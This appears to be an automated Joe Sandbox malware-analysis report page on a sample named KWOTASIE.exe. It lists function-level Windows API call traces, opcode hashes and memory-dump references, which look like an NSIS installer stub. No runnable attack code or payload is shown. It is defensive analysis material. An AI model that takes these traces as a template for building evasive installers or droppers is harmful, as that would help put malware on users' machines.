Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4

Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8

Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745

Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,Remove folder: ,?), ref: 004060DD

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1bd4d2410b569f87dce378e8f9561a84c12a3ebb813fa83cf21d9345b916f26c
Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
Opcode Fuzzy Hash: 1bd4d2410b569f87dce378e8f9561a84c12a3ebb813fa83cf21d9345b916f26c
Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59

Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C

Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19

Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004052B0: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
Part of subcall function 004052B0: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
Part of subcall function 004052B0: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47

Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A

Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: dc9a5ee313f0edd564a484b62bba3d4dd2351bb93fec450803f9676c8a93a235
Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
Opcode Fuzzy Hash: dc9a5ee313f0edd564a484b62bba3d4dd2351bb93fec450803f9676c8a93a235
Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE

Non-executed Functions

Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C44
GetDlgItem.USER32(?,00000408), ref: 00404C4F
GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
LoadBitmapW.USER32(0000006E), ref: 00404CAC
SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
DeleteObject.GDI32(00000000), ref: 00404D22
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
ShowWindow.USER32(?,00000005), ref: 00404E7C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
ImageList_Destroy.COMCTL32(?), ref: 0040504C
GlobalFree.KERNEL32(?), ref: 0040505C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
ShowWindow.USER32(?,00000000), ref: 004051FB
GetDlgItem.USER32(?,000003FE), ref: 00405206
ShowWindow.USER32(00000000), ref: 0040520D

Strings

M, xrefs: 00404DD6
N, xrefs: 00404EB7
, xrefs: 004051E5

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58

Function 004046B0 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004046FF
SetWindowTextW.USER32(00000000,?), ref: 00404729
SHBrowseForFolderW.SHELL32(?), ref: 004047DA
CoTaskMemFree.OLE32(00000000), ref: 004047E5
lstrcmpiW.KERNEL32(Remove folder: ,004236E8,00000000,?,?), ref: 00404817
lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404823
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835

Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5

Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406543
Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406557
Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 0040656A

GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913

Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29

Strings

Remove folder: , xrefs: 00404811, 00404816, 00404821
6B, xrefs: 004047AD
A, xrefs: 004047D3
C:\Users\user\AppData\Local\Innoxious, xrefs: 00404800
Lx, xrefs: 004046B6

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
